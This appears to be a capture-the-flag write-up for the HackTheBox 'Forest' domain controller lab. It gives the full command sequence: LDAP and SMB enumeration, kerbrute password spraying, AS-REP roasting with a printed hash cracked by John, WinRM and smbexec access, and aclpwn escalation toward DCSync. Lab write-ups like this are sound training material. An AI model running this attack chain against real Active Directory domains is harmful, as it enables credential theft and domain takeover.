Forest 10.10.10.161
Defenders think in lists. Attackers think in graphs. As long as this is true, attackers win. <John Lambert>
Last updated
Was this helpful?
Defenders think in lists. Attackers think in graphs. As long as this is true, attackers win. <John Lambert>
Last updated
Was this helpful?
is an "Easy" difficulty Windows machine. It is a Windows Domain Controller (DC) and installed an Exchange server, it requires the DC enumeration technique and Kerberos knowledge.
Anonymous LDAP can be used to access the DC server and enumerate domain objects. A service account was found in which the Kerberos pre-authentication disabled, it can be cracked to gain the initial access. This service was a member of the "Account Operators" group, which can be used to create a privileged Exchange account.
Finally, this privileged account was leveraged to gain DCSync privileges on the domain and dump the NTLM hashes.
Nmap
Kerberos
SMB: smbclient, smbmap, enum4linux
Ldap: ldapsearch
NTLM: impacket/GetNPUsers
Password Crack: John
SMB connection: impacket/smbexec
Evil-winrm.rb
Check vulnerability: sherlock.ps1
secretsdump
Target machine: 10.10.10.161
Attacking (Hacker) machine: 10.10.14.18
The target machine IP is 10.10.10.161. Get a basic understanding the available services of the target machine using nmap aggressive scanning to all available ports.
0.1) Quick Pre-searching
nmap 10.10.10.161, quick scan to get the opened port list
0.2) Details Analysis
Enumeration strategies
LDAP - Port 389
SMB - Port 135
Kerberos - Port 88
enum4linux 10.10.10.161, get the basic information of the target machine
nmap -p 389 --script ldap-rootdse 10.10.10.161
ldapsearch -x -h 10.10.10.161 -b "DC=htb,DC=local"
Keep this information for later use
Domain: HTB with the following user
HTB\sebastien
HTB\lucinda
HTB\svc-alfresco
HTB\andy
HTB\mark
HTB\santi
Anonymous SMB login does not allow, SMB service does not available if no user credential
smbclient -I 10.10.10.161 -L andy
smbmap -R Replication -H 10.10.10.161
Using the kerbrute to evaluate those user accounts found at above
../../../tools/win/kerbrute/kerbrute.py -domain htb.local -users ./user.list -passwords /usr/share/wordlists/rockyou.txt -outputfile forest_passwords.txt
It finds that the svc-alfresco account is “not preauth” account. Try to get the TGT using getNPUsers
Add the 10.10.10.161 to hosts file for the htb.local and try again
Cracking AS-REP Hashes with HashCat/John
$krb5asrep$23$svc-alfresco@HTB.LOCAL:3ce79e32b438b810950ea097f50ccedf$63b3f13f672cc9d483230b4c28ea26ff574bd9906b92cd5193d8496b2059ba20d009e50f7f3eed3d5440709e3b45b949ae456f27dd61b58c4e81a70e60c41adf75af3615acdd655455daa8023a9e931e91078e72db14241e8670375052ea5e13d817f328ffc19ca80873b736892fc1b65127d2f3f852eb11cb5749b46bad8fe49349352f9b5995f26f5cd24ea13d446710004a7cd86177206b638cff8f791a8df3a3c3a059c9087a99f18c9f5b21445a306d3695aed15377b3380b4c8b3e431bcf59afedabedf890d4457c38f193d750052f952e0ea746a16e6014615b4afe1fd4a4335fa14d
john --wordlist=/usr/share/wordlists/rockyou.txt alfresco.tgt
python ../../../tools/win/impacket-0.9.20/examples/getTGT.py htb.local/svc-alfresco:s3rvice
Get the password of svc-alfresco
The password of svc_alfresco is confirmed, but it cannot be accessed by SMB
../../../tools/win/impacket-0.9.20/examples/smbexec.py htb.local/svc-alfresco:s3rvice@10.10.10.161 net user
3.1) WinRM
Test the WinRM (Windows Remote Management) service using the account
evil-winrm.rb
Get the low privilege access, check the flag
Check the svc-alfresco is not the local administrators group
3.1) Enumeration
No Vulnerability found
sherlock.ps1
Cannot get the ntlm hash using the account using secretsdump
4.1) Sherlock to find the vulnerability of the system
Objective: from SVC-aldresco to HTB.local
aclpwn -f svc-alfresco -ft user -d htb.local -t htb.local -dry -s 10.10.10.161 -u svc-alfresco -p s3rvice
aclpwn -f svc-alfresco -ft user -d htb.local -t htb.local -s 10.10.10.161 -u svc-alfresco -p s3rvice
What is kerberos and how to attack it.
nmap -p 22,80,443 -A -o nmap-forest.txt 10.10.10.161
